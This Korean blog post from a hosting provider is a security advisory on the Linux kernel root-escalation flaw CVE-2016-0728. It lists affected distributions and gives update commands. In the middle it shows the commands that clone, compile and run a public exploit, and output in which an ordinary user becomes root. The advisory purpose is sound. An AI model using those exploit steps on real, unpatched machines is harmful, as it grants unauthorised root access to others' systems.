메뉴 닫기

리눅스커널 Zero-Day(CVE-2016-0728) 취약점

원문 : http://thehackernews.com/2016/01/linux-kernel-hacker.html
참고: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
cve

아래는 원문내용을 일부분만 발췌해 번역한 글이니 참고만하시고 자세한 내용은 위에 링크를 통해 확인하세요.

“안드로이드와 리눅스 어플리케이션에서 root 수준의 권한을 획득하는 취약점이 발견되었다.

커널 취약점 CVE-2016-0728
커널 3.8 이상의 32비트/64비트 모든 운영체제에 영향이 있다.
취약점을 이용해 공격할경우 운영체제내의 root 권한을 가지고 개인정보 및 악성앱등을 설치할수 있기에 반드시 패치해서 이용하시기를 바랍니다.”

커널취약점을 가지고 root 권한을 획득하는 예시입니다.
해당코드는 Git 페이지에 공개되어있습니다.
스마일서브에서 제공하는 가상화 1Core / 1G RAM 서버에서 약1시간이내에 root 권한이 획득되었음을 테스트하였습니다.

root@ubuntu# lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.1 LTS
Release: 14.04
Codename: trusty

root@ubuntu# uname -a
Linux ubuntu 3.19.0-37-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
smileserv@ubuntu:~$ git clone https://gist.github.com/18b1e86d1c0f8531ff8f.git
smileserv@ubuntu:~$ cd 18b1e86d1c0f8531ff8f
smileserv@ubuntu:~$ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall
smileserv@ubuntu:~$./cve_2016_0728 PP1
uid=1000, euid=1000
Increfing...
finished increfing
forking...
finished forking
caling revoke...
uid=0, euid=0
root@ubuntu#
root@ubuntu# whoami
root

아래는 취약점에 영향을 받는 리눅스 배포판 목록과 패치 방법입니다.
Red Hat Enterprise Linux 7
CentOS Linux 7
Scientific Linux 7
Debian Linux stable 8.x (jessie)
Debian Linux testing 9.x (stretch)
SUSE Linux Enterprise Desktop 12
SUSE Linux Enterprise Desktop 12 SP1
SUSE Linux Enterprise Server 12
SUSE Linux Enterprise Server 12 SP1
SUSE Linux Enterprise Workstation Extension 12
SUSE Linux Enterprise Workstation Extension 12 SP1
Ubuntu Linux 14.04 LTS (Trusty Tahr)
Ubuntu Linux 15.04 (Vivid Vervet)
Ubuntu Linux 15.10 (Wily Werewolf)
Opensuse Linux LEAP and version 13.2

패치방법은 yum or apt-get 을 통해 업데이트 하면됩니다.

$ sudo apt-get update && sudo apt-get upgrade
$ sudo reboot
$ sudo yum update
$ sudo reboot

 

 

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
0
Would love your thoughts, please comment.x
()
x